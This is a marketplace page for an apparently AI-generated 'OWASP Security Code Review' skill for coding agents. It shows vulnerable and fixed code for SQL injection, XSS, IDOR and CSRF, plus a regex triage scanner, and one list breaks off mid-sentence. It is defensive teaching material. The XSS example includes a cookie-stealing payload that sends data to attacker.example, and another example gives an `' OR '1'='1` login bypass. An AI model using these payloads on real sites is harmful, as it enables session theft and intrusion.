OWASP Security Code Review
Systematically analyze code for OWASP Top 10 vulnerabilities, specifically identifying SQL injection, XSS, CSRF, and insecure direct object references with actionable remediation guidance.
Install for your agent
Pick your agent → choose your OS → copy the command. The CLI does both steps for you.
npx mfkvault install generated-hdxj6wrr
Requires MFKVault CLI — writes skill.md to the right folder for the agent you pick.
cp skill.md "~/.claude/skills/generated-hdxj6wrr/"
Assumes you already have skill.md in your working directory. Need it? See the curl alternative below.
curl alternative: not available. The source URL is missing, so use the CLI command above or open the source repo and copy the file manually.
Third-party skill — review the source, license, and security before installing. Folders default to ~/.claude/skills/generated-hdxj6wrr/.
Description
---
⚠️ AI-Generated Skill. Generated by MFKVault on 2026-05-14. Review before use. Not professional advice. Modify as needed for your use case.
---

---
name: OWASP Security Code Review
description: Systematically analyze code for OWASP Top 10 vulnerabilities, specifically identifying SQL injection, XSS, CSRF, and insecure direct object references with actionable remediation guidance.
---

# OWASP Security Code Review

## When to use this skill

Use this skill when reviewing any code that handles user input, database queries, authentication, or sensitive data operations. Activate it during pull request reviews, security audits, or before deploying to production environments. It applies to web applications, APIs, and backend services that interact with databases or render user-controlled content.

## Key behaviors

- **Identify SQL injection vectors** by scanning for user input concatenated or interpolated into SQL strings, flagging queries that do not use parameterized statements, and flagging dynamic query construction without proper escaping
- **Flag XSS vulnerabilities** by finding unescaped user input rendered in HTML or JavaScript contexts, detecting unsafe use of `innerHTML` / `dangerouslySetInnerHTML`, and noting a missing Content-Security-Policy header as a lost defense-in-depth layer (a CSP reduces impact; it does not fix the injection)
- **Detect CSRF weaknesses** by verifying that state-changing requests (POST/PUT/DELETE) carry a CSRF token, checking the `SameSite` attribute on session cookies, and confirming that the server actually validates the token
- **Spot insecure direct object references (IDOR)** by checking for an authorization check before a resource is loaded by ID, detecting missing permission validation, and identifying predictable or sequential identifiers used without access control
- **Provide specific code examples** showing the vulnerable pattern and the secure remediation in the same language and framework
- **Prioritize findings by severity** (critical, high, medium, low) and explain the business impact of each finding
- **Reference OWASP documentation** by linking each finding to its OWASP Top 10 (2021) category and CWE number for lookup and remediation guidance

## Examples

### Example 1: SQL Injection in User Login

**Vulnerable Code (Python):**

```python
username = request.form['username']
password = request.form['password']
query = "SELECT * FROM users WHERE username = '" + username + "' AND password = '" + password + "'"
result = db.execute(query)
```

**Security Issue:** CRITICAL - A03:2021 Injection (CWE-89). User input is concatenated into the SQL statement. Submitting `' OR '1'='1` as the username or password rewrites the WHERE clause and bypasses authentication.

**Remediation:**

```python
username = request.form['username']
password = request.form['password']
# Placeholders keep user input out of the SQL text; the driver passes it as data
query = "SELECT * FROM users WHERE username = ? AND password = ?"
result = db.execute(query, (username, password))
```

This fixes the injection only. Comparing the password inside the query implies it is stored in plaintext; a real login should fetch the row by username alone and verify a salted password hash (bcrypt, scrypt or Argon2) in application code.

---

### Example 2: Cross-Site Scripting in Comment Display

**Vulnerable Code (JavaScript/React):**

```javascript
function DisplayComment({comment}) {
  return <div>{comment.text}</div>; // already safe: JSX escapes text children
}

// The actual vulnerability: user input written to the DOM as markup
const html = `<h1>${userInput}</h1>`;
document.getElementById('container').innerHTML = html;
```

**Security Issue:** HIGH - A03:2021 Injection (CWE-79, XSS). User input is parsed as HTML, so a payload such as `<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">` runs in other users' browsers, stealing session cookies or performing actions on their behalf. Note that `<script>` elements inserted through `innerHTML` are not executed, but event-handler attributes are, so the classic `<script>alert('XSS')</script>` probe will miss this sink while real payloads do not.

**Remediation:**

```javascript
import DOMPurify from 'dompurify';

function DisplayComment({comment}) {
  return <div>{comment.text}</div>; // React escapes text children by default
}

// Plain text belongs in textContent, never innerHTML. When the input really
// must be rendered as HTML, sanitize it with an allow-list library first.
const html = `<h1>${DOMPurify.sanitize(userInput)}</h1>`;
document.getElementById('container').innerHTML = html;

// Defense in depth, not a fix: send a Content Security Policy response header
// Content-Security-Policy: default-src 'self'; script-src 'self'
```

---

### Example 3: Insecure Direct Object Reference in Document Retrieval

**Vulnerable Code (Node.js/Express):**

```javascript
app.get('/documents/:id', (req, res) => {
  const docId = req.params.id;
  const doc = db.query(`SELECT * FROM documents WHERE id = ${docId}`);
  res.json(doc);
});
```

**Security Issue:** HIGH - A01:2021 Broken Access Control (CWE-639). Any authenticated user can read any document by changing the ID in the URL (e.g., `/documents/999`); nothing verifies that the caller owns or may view that document. The template literal also injects `docId` into the SQL text, so the same handler is CRITICAL for A03:2021 Injection (CWE-89).

**Remediation:**

```javascript
app.get('/documents/:id', authenticateUser, async (req, res) => {
  const docId = req.params.id;
  const userId = req.user.id;
  // Authorize inside the query: the row must belong to the caller.
  // Placeholders also remove the injection in the original template literal.
  const doc = await db.query(
    'SELECT * FROM documents WHERE id = ? AND owner_id = ?',
    [docId, userId]
  );
  if (!doc) {
    return res.status(403).json({error: 'Access denied'});
  }
  res.json(doc);
});
```

Responding 404 for both missing and foreign IDs avoids confirming that a document exists; 403 is acceptable where enumeration of IDs is not a concern.

---

### Example 4: Missing CSRF Token in Form Submission

**Vulnerable Code (HTML/PHP):**

```html
<form method="POST" action="/transfer-funds">
  <input type="text" name="amount" />
  <input type="text" name="recipient" />
  <button type="submit">Transfer</button>
</form>
```

**Security Issue:** MEDIUM - A01:2021 Broken Access Control (CWE-352, CSRF). A malicious site can auto-submit an identical form; the browser attaches the victim's session cookie, so funds are transferred without the user's knowledge or consent.

**Remediation:**

```php
<?php
session_start();
// One unpredictable token per session; random_bytes is a CSPRNG
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}
?>
<form method="POST" action="/transfer-funds">
  <input type="hidden" name="csrf_token" value="<?php echo htmlspecialchars($_SESSION['csrf_token']); ?>" />
  <input type="text" name="amount" />
  <input type="text" name="recipient" />
  <button type="submit">Transfer</button>
</form>
```

Server-side validation (PHP) on the handler that processes the transfer:

```php
<?php
session_start();
// hash_equals is constant-time; a plain !== comparison leaks timing.
// is_string guards against csrf_token[]=x turning the value into an array.
if (!isset($_POST['csrf_token'], $_SESSION['csrf_token'])
    || !is_string($_POST['csrf_token'])
    || !hash_equals($_SESSION['csrf_token'], $_POST['csrf_token'])) {
    http_response_code(403);
    die('CSRF token validation failed');
}
// Process transfer
?>
```

Also set the `SameSite` attribute on the session cookie so browsers withhold it from cross-site requests:

```http
Set-Cookie: session=abc123; SameSite=Strict; HttpOnly; Secure
```

---

### Example 5: Parameterized Queries with Multiple Input Points

**Vulnerable Code (Java):**

```java
String userId = request.getParameter("user_id");
String status = request.getParameter("status");
String query = "UPDATE users SET status = '" + status + "' WHERE id = " + userId;
statement.executeUpdate(query);
```

**Security Issue:** CRITICAL - A03:2021 Injection (CWE-89). Both `userId` and `status` are concatenated into the statement, so either parameter can inject SQL.

**Remediation:**

```java
String userId = request.getParameter("user_id");
String status = request.getParameter("status");
String query = "UPDATE users SET status = ? WHERE id = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, status);
// Integer.parseInt rejects non-numeric input with NumberFormatException;
// catch it and return 400 rather than letting it surface as a 500
stmt.setInt(2, Integer.parseInt(userId));
stmt.executeUpdate();
```

## What NOT to do

- **Don't assume input validation alone prevents SQL injection:** always use parameterized queries regardless of validation
- **Don't trust client-side validation for security:** attackers can bypass JavaScript checks; always validate and authorize server-side
- **Don't use innerHTML with user input:** use textContent, innerText, or framework-level escaping instead
- **Don't implement custom authentication or CSRF protection:** use established libraries and frameworks (Spring Security, Django CSRF,
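The key behaviors above are pattern checks a reviewer applies by hand. As an added example (not part of the MFKVault skill), the Python script below applies those four checks heuristically to source text and tags each hit with the OWASP Top 10 (2021) category and CWE the skill asks reviewers to cite. The rule names, the `Finding` type and the `SAMPLE_SOURCE` input are this example's own constructions; the sample deliberately mixes vulnerable lines with their remediated forms so the scanner's output can be compared against the examples above.

```python
"""Heuristic triage scanner for the four review targets in the skill above.

Added example, not part of the MFKVault skill. Regex rules flag candidate
SQL string building, DOM XSS sinks, POST forms without a CSRF token, and
Express routes that take an ID parameter with no middleware in front of
the handler. Regexes cannot follow data flow, so treat the output as a
worklist for manual review, not a verdict.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    owasp: str
    cwe: str
    line: int
    snippet: str


# Single-line rules: (name, severity, OWASP category, CWE, pattern).
LINE_RULES = [
    # A SQL verb followed on the same line by '+ identifier', '${' or '{name}':
    # the statement text is being assembled from variables.
    ("sql-string-build", "CRITICAL", "A03:2021 Injection", "CWE-89",
     re.compile(r"(?i)\b(?:select|insert|update|delete)\b.*?(?:\+\s*\w|\$\{|\{\w+\})")),
    # Sinks that parse a string as HTML.
    ("dom-xss-sink", "HIGH", "A03:2021 Injection", "CWE-79",
     re.compile(r"\.innerHTML\s*=|dangerouslySetInnerHTML|document\.write\s*\(")),
    # Express-style route with a ':param' whose handler is the very next
    # argument, i.e. no authentication/authorization middleware precedes it.
    ("route-id-no-middleware", "HIGH", "A01:2021 Broken Access Control", "CWE-639",
     re.compile(r"""\b(?:app|router)\.(?:get|post|put|patch|delete)\(\s*['"][^'"]*:\w+[^'"]*['"]\s*,\s*(?:async\s*)?(?:function\b|\()""")),
]

# Multi-line rule: a POST form whose body contains no token-looking field.
POST_FORM_RE = re.compile(
    r"<form\b[^>]*\bmethod\s*=\s*['\"]?post['\"]?[^>]*>(.*?)</form>",
    re.IGNORECASE | re.DOTALL)
TOKEN_FIELD_RE = re.compile(r"csrf|_token", re.IGNORECASE)


def scan(source: str) -> list[Finding]:
    """Return findings sorted by line number."""
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule, severity, owasp, cwe, pattern in LINE_RULES:
            if pattern.search(line):
                findings.append(Finding(rule, severity, owasp, cwe, lineno, line.strip()))
    for match in POST_FORM_RE.finditer(source):
        if not TOKEN_FIELD_RE.search(match.group(1)):
            lineno = source.count("\n", 0, match.start()) + 1
            findings.append(Finding("post-form-without-csrf-token", "MEDIUM",
                                    "A01:2021 Broken Access Control", "CWE-352",
                                    lineno, match.group(0).splitlines()[0].strip()))
    return sorted(findings, key=lambda f: f.line)


def report(source: str) -> list[str]:
    """One line per finding, in the 'severity - category (CWE)' style used above."""
    return [f"line {f.line}: {f.severity} - {f.owasp} ({f.cwe}) [{f.rule}] {f.snippet}"
            for f in scan(source)]


# Constructed sample mixing vulnerable and remediated lines (not real project code).
SAMPLE_SOURCE = r'''
query = "SELECT * FROM users WHERE username = '" + username + "'"
result = db.execute("SELECT * FROM users WHERE username = ?", (username,))
document.getElementById('container').innerHTML = html;
app.get('/documents/:id', (req, res) => { res.json(lookup(req.params.id)); });
app.get('/files/:id', authenticateUser, (req, res) => { res.json(lookup(req.params.id, req.user.id)); });
<form method="POST" action="/transfer-funds">
  <input type="text" name="amount" />
</form>
<form method="POST" action="/profile">
  <input type="hidden" name="csrf_token" value="..." />
</form>
'''

if __name__ == "__main__":
    for entry in report(SAMPLE_SOURCE):
        print(entry)
```

Run against the sample it reports four findings (lines 2, 4, 5 and 7) and stays silent on the parameterized query, the middleware-protected route and the tokened form. The CSRF rule is the only one that needs the whole file rather than a line, which is why it is a second pass; the others are deliberately per-line so they can be pointed at a diff hunk as well as a full file.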
Security Status: Unvetted (not yet security scanned)